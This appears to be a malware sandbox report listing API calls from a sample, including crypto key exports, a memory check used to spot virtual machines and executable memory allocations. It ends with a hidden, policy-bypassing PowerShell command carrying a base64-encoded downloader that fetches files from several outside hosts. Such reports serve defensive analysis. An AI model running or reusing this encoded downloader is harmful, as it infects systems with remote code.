CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2023, 9:25 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 145 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlA